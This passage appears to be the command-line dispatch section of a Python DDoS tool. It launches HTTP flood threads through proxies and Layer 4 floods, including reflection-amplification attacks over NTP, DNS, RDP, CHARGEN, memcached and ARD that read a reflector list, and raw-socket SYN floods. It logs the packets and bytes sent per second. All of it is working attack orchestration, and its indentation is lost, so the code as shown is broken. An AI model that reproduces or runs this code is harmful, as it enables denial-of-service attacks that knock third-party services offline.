logger.info("Empty Proxy File, Running flood witout proxy")
proxies = None
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = argv[2].strip()
if ":" in target and not target.split(":")[1].isnumeric(): exit("Invalid Port Number")
port = 53 if ":" not in target else int(target.split(":")[1])
threads = int(argv[3])
timer = int(argv[4])
ref = None
if ":" not in target:
logger.warning("Port Not Selected, Set To Default: 80")
else:
target = target.split(":")[0]
if 65535 < port or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ")
if not ProxyTools.Patterns.IP.match(target): exit("Invalid Ip Selected")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket(): exit("Cannot Create Raw Socket ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD"}:
if len(argv) == 7:
logger.setLevel("DEBUG")
if len(argv) == 6:
refl_li = Path(__dir__ / "files" / argv[5].strip())
if not refl_li.exists(): exit("The Reflector file doesn't exist ")
ref = set(a.strip() for a in ProxyTools.Patterns.IP.findall(refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
else:
if len(argv) == 6:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event).start()
logger.info("Attack Started to %s with %s method for %s seconds, threads: %d!" %
(target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' % (Tools.humanformat(int(requests_sent)),
Tools.humanbytes(int(bytes_sent)),
round((time() - ts) / timer * 100, 2)))
requests_sent.set(0)
bytes_sent.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()